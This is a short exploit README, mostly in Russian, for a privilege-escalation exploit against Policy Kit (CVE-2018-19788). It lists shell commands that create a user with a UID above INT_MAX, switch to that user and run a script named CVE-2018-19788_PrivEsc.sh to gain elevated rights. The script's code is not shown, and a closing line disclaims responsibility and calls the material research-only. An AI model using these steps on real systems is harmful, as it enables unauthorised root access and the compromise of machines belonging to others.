
Silly easy exploit for CVE-2018-19788
Глупый простой эксплойт для CVE-2018-19788
Для использования этого вам необходимо либо создать пользователя с UID > INT_MAX в Policy Kit, либо уже иметь непривилегированного пользователя с указанным UID.
UID может быть указан при создании пользователя следующим образом и использован перед выполнением скрипта:
$ useradd -u 4000000001 PrivEsc
$ passwd PrivEsc
$ su PrivEsc
$ chmod +x /tmp/CVE-2018-19788_PrivEsc.sh
$ ./tmp/CVE-2018-19788_PrivEsc.sh
Обратите внимание, что это предназначено только для исследований, и вы несете ответственность за любое использование кода из этого репозитория или любого другого, как того требует здравый смысл.